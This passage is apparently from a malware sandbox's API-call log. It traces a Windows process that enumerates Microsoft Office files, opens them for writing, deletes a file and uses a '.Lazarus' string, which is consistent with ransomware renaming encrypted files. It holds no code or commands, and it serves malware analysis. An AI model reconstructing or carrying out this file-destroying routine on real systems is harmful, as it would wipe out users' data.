(HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0135.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 69 [0135.522] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8379)) returned 1 [0135.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0135.523] AreFileApisANSI () returned 1 [0135.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0135.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0135.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0135.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0135.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0135.523] GetLastError () returned 0x0 [0189.688] GetFileType (hFile=0x250) returned 0x1 [0189.689] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0189.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0xa8b98 [0189.690] GetLastError () returned 0xb7 [0189.691] SetLastError (dwErrCode=0xb7) [0189.691] WriteFile (in: hFile=0x250, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0189.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0xa8b98 | out: hHeap=0x20000) returned 1 [0189.698] CloseHandle (hObject=0x250) returned 1 [0189.702] AreFileApisANSI () returned 1 [0189.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0189.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0189.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF") returned 69 [0189.703] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02886_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02886_.wmf")) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fb8 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40eb8 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f88 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40ef8 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f78 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x41048 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd80 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0xd5170 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92d48 | out: hHeap=0x20000) returned 1 [0189.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0189.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88a90 | out: hHeap=0x20000) returned 1 [0189.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889c8 | out: hHeap=0x20000) returned 1 [0189.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fe8 | out: hHeap=0x20000) returned 1 [0189.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f38 | out: hHeap=0x20000) returned 1 [0189.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0189.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.713] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02958_.WMF", cAlternateFileName="")) returned 1 [0189.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88900 [0189.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88a90 [0189.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88888 [0189.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x888b0 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88888 | out: hHeap=0x20000) returned 1 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88a90 | out: hHeap=0x20000) returned 1 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88900 | out: hHeap=0x20000) returned 1 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x888b0 | out: hHeap=0x20000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x41048 [0189.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35070 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x41048 | out: hHeap=0x20000) returned 1 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35070 | out: hHeap=0x20000) returned 1 [0189.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40fb8 [0189.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0189.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fb8 | out: hHeap=0x20000) returned 1 [0189.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88900 [0189.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0189.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x889f0 [0189.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0189.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0189.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889f0 | out: hHeap=0x20000) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0189.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0189.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0189.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88900 | out: hHeap=0x20000) returned 1 [0189.716] AreFileApisANSI () returned 1 [0189.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF", lpUsedDefaultChar=0x0) returned 69 [0189.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0189.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0189.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40fe8 [0189.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x41048 [0189.909] AreFileApisANSI () returned 1 [0189.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0189.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0189.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF") returned 69 [0189.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x370 [0189.925] GetFileType (hFile=0x370) returned 0x1 [0189.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0189.925] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0189.926] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0189.926] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0189.927] CloseHandle (hObject=0x370) returned 1 [0189.927] AreFileApisANSI () returned 1 [0189.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0189.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0189.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF") returned 69 [0189.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x370 [0189.928] GetFileType (hFile=0x370) returned 0x1 [0189.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0189.929] CloseHandle (hObject=0x370) returned 1 [0189.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x889c8 [0189.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88a68 [0189.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88ab8 [0189.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x889f0 [0189.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88ab8 | out: hHeap=0x20000) returned 1 [0189.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88a68 | out: hHeap=0x20000) returned 1 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889c8 | out: hHeap=0x20000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0189.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0189.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0189.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889f0 | out: hHeap=0x20000) returned 1 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0189.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88978 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88950 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88ae0 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88a68 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88ae0 | out: hHeap=0x20000) returned 1 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88950 | out: hHeap=0x20000) returned 1 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88978 | out: hHeap=0x20000) returned 1 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88ab8 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88950 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88ae0 [0189.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88978 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88ae0 | out: hHeap=0x20000) returned 1 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88950 | out: hHeap=0x20000) returned 1 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88a68 | out: hHeap=0x20000) returned 1 [0189.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88ab8 | out: hHeap=0x20000) returned 1 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88978 | out: hHeap=0x20000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x888b0 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88950 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x889c8 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x889f0 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889c8 | out: hHeap=0x20000) returned 1 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88950 | out: hHeap=0x20000) returned 1 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x888b0 | out: hHeap=0x20000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88950 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x889f0 | out: hHeap=0x20000) returned 1 [0189.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88978 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88950 | out: hHeap=0x20000) returned 1 [0189.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88978 | out: hHeap=0x20000) returned 1 [0189.932] AreFileApisANSI () returned 1 [0189.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0189.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF") returned 69 [0189.933] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02958_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02958_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22f4)) returned 1 [0189.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0189.933] AreFileApisANSI () returned 1 [0189.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0189.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88ae0 [0189.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x888b0 [0189.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88b08 [0189.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x888b0 | out: hHeap=0x20000) returned 1 [0189.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88ae0 | out: hHeap=0x20000) returned 1 [0189.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b08 | out: hHeap=0x20000) returned 1 [0189.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x888b0 [0189.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88978 [0189.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0189.934] GetLastError () returned 0x0 [0247.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.635] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.635] FindNextFileW (in: hFindFile=0x78810, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3fdcd93, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3fdcd93, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4180773, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="HomeBusinessR_Retail2-ul-oob.xrm-ms", cAlternateFileName="HOBCC6~1.XRM")) returned 1 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0247.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0247.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40f68 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f68 | out: hHeap=0x20000) returned 1 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40f68 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f68 | out: hHeap=0x20000) returned 1 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0247.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0247.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0247.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0247.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0247.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0247.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0247.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0247.638] AreFileApisANSI () returned 1 [0247.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 